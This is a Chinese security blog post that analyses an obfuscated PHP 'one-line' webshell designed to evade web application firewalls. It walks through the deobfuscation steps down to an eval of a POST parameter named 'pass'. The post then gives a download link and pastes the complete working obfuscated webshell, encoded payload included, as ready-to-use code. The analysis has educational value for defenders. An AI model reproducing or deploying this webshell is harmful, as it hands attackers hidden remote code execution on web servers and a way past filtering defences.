一款过waf的一句话木马分析

颓废 2019年5月19日08:54:45颓废's Blog2786 views4262字阅读14分12秒阅读模式
摘要

中午,下班回来,就看一个朋友给我发了几个马儿  让我看看解解密码  很简单

中午,下班回来,就看一个朋友给我发了几个马儿  让我看看解解密码  很简单

一款过waf的一句话木马分析一款过waf的一句话木马分析

 

猛不猛我不知道   那时候手机  太长的看着就烦   就回到家瞅瞅了

首先我们看这个马儿

 

一款过waf的一句话木马分析

一步步来,先分析前面的。前面的PHP代码部分有一个eval,我们改成echo试试

一款过waf的一句话木马分析

输出得到

 

$OO0OO0000=$OOO000000{17}.$OOO000000{12}.$OOO000000{18}.$OOO000000{5}.$OOO000000{19};if(!0)$O000O0O00=$OO0OO0000($OOO0O0O00,'rb');$OO0OO000O=$OOO000000{17}.$OOO000000{20}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OO0OO00O0=$OOO000000{14}.$OOO000000{0}.$OOO000000{20}.$OOO000000{0}.$OOO000000{20};$OO0OO000O($O000O0O00,1136);$OO00O00O0=($OOO0000O0($OO0OO00O0($OO0OO000O($O000O0O00,380),'7q84PCgpNaRWIyHw9bZD6xrXYU0EonLetGSOmlFiK5QkuhM3jT/VfBvc+12AsdJz=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')));eval($OO00O00O0);

替换进去得到

 

一款过waf的一句话木马分析

下来我们就要分析了

 

<?php $OOO0O0O00=__FILE__; //$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');  $OOO000000='th6sbehqla4co_sadfpnr';  $OO00O0000=248;  //$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5}; //$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16}; //$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5}; $OOO0000O0='base64_decode';  $O0O0000O0='OOO0000O0';  //$OO0OO0000=$OOO000000{17}.$OOO000000{12}.$OOO000000{18}.$OOO000000{5}.$OOO000000{19}; $OO0OO0000='fopen';  //if(!0)$O000O0O00=$OO0OO0000($OOO0O0O00,'rb'); $O000O0O00=fopen($OOO0O0O00,'rb');  //$OO0OO000O=$OOO000000{17}.$OOO000000{20}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16}; $OO0OO000O=='fread';  //$OO0OO00O0=$OOO000000{14}.$OOO000000{0}.$OOO000000{20}.$OOO000000{0}.$OOO000000{20}; $OO0OO00O0='strtr';  //$OO0OO000O($O000O0O00,1136); fread($O000O0O00,1136);  /*$OO00O00O0=($OOO0000O0(     $OO0OO00O0(              $OO0OO000O($O000O0O00,380),     '7q84PCgpNaRWIyHw9bZD6xrXYU0EonLetGSOmlFiK5QkuhM3jT/VfBvc+12AsdJz=',     'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'     )    ) );*/  $OO00O00O0=(base64_decode(  strtr(   $OO0OO000O($O000O0O00,380),   '7q84PCgpNaRWIyHw9bZD6xrXYU0EonLetGSOmlFiK5QkuhM3jT/VfBvc+12AsdJz=',   'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'   )  ) );   ;eval($OO00O00O0); return; ?>

分析后总结得到

 

 

$OOO0O0O00=__FILE__;//获取当前文件名 $O000O0O00=fopen($OOO0O0O00,'rb');//打开文件 fread($O000O0O00,248);//跳过248字节 $OO00O00O0=(base64_decode(  strtr(   fread($O000O0O00,380),   '7q84PCgpNaRWIyHw9bZD6xrXYU0EonLetGSOmlFiK5QkuhM3jT/VfBvc+12AsdJz=',   'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'   )  ) );//读取380字节,根据代码表替换字符,base64解码 eval($OO00O00O0);//执行解码后的代码

一款过waf的一句话木马分析

 

 

解得

 

@eval($_POST['pass']);//密码就等于pass

 

怎么解得卖个关子  不会的可以看看

下載面板

  文件名稱:一句话木马

  更新時間:

  下載声明:密码: gadu

立即下載

下载链接

网盘下载

密码: gadu

避免下载,附一句话木马代码,可能会被本地杀毒认为webshell:

<?php // 
$OOO0O0O00=__FILE__;$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');$OO00O0000=248;$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$O0O0000O0='OOO0000O0';eval(($$O0O0000O0('JE9PME9PMDAwMD0kT09PMDAwMDAwezE3fS4kT09PMDAwMDAwezEyfS4kT09PMDAwMDAwezE4fS4kT09PMDAwMDAwezV9LiRPT08wMDAwMDB7MTl9O2lmKCEwKSRPMDAwTzBPMDA9JE9PME9PMDAwMCgkT09PME8wTzAwLCdyYicpOyRPTzBPTzAwME89JE9PTzAwMDAwMHsxN30uJE9PTzAwMDAwMHsyMH0uJE9PTzAwMDAwMHs1fS4kT09PMDAwMDAwezl9LiRPT08wMDAwMDB7MTZ9OyRPTzBPTzAwTzA9JE9PTzAwMDAwMHsxNH0uJE9PTzAwMDAwMHswfS4kT09PMDAwMDAwezIwfS4kT09PMDAwMDAwezB9LiRPT08wMDAwMDB7MjB9OyRPTzBPTzAwME8oJE8wMDBPME8wMCwxMTM2KTskT08wME8wME8wPSgkT09PMDAwME8wKCRPTzBPTzAwTzAoJE9PME9PMDAwTygkTzAwME8wTzAwLDM4MCksJzdxODRQQ2dwTmFSV0l5SHc5YlpENnhyWFlVMEVvbkxldEdTT21sRmlLNVFrdWhNM2pUL1ZmQnZjKzEyQXNkSno9JywnQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejAxMjM0NTY3ODkrLycpKSk7ZXZhbCgkT08wME8wME8wKTs=')));return;?>
aPdwI4qwI4qwI4BVnpaeoFxjEgCOUZtiXBdgZ6TCXBsiW8NiNS+mDfdwIPsjDV7jWSNiNSjKaPdwDV7jI4qwI8tmDfsjDfsjIPsjR8bwDVqwDV7jIPsKaPsjI4qwIPsjI8jmDfsjIPsjI47jRZjiycP+yCq4UcqHYxaXZXlNnVlSrm9vLpaYrx6jbrdMDgxfbBywErTg06uB6rhB0PfV0l93xFU8nFIkIDaqovbRLOfiW8nq9myPb6UpZPlRZfTyDmd96xaDxCxrxBGUrFCSYvblUFnK0r5kEgBMEcqToiyfnXUcLpl2I4P/IV9ByOo+HZu3a/m5RZmAUFyuEcylR8bwI47jDVqwI475HvxvYrjKaPdwI4qwI4qwI8mAUryKE/7iwgGfErjJwgGlYr9J49KsnglfEg6Jy47fNP13n8qgEcxMU4j3nglfEg6J49KsWvGlYr9Jwga3UpmJ49Ks04PJDFdfNPU3nr1mw8dKID+y8OTjwlbKUZq/UXCBUXyfUr9txxaIN8sfI49tnvCVNg13n8qFEcxMU8q3ESqf0glVNpyloiUloS+sWc7J49KsWva3UpmJw8dKngBuwtfRaVh7UXUGE8tmXBqw6BbEacqGocIiXZmA

 

 

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
颓废
  • 本文由 发表于 2019年5月19日08:54:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  一款过waf的一句话木马分析 http://cn-sec.com/archives/67949.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen:

评论:2   其中:访客  2   博主  0
    • qwer 0

      可见隐藏内容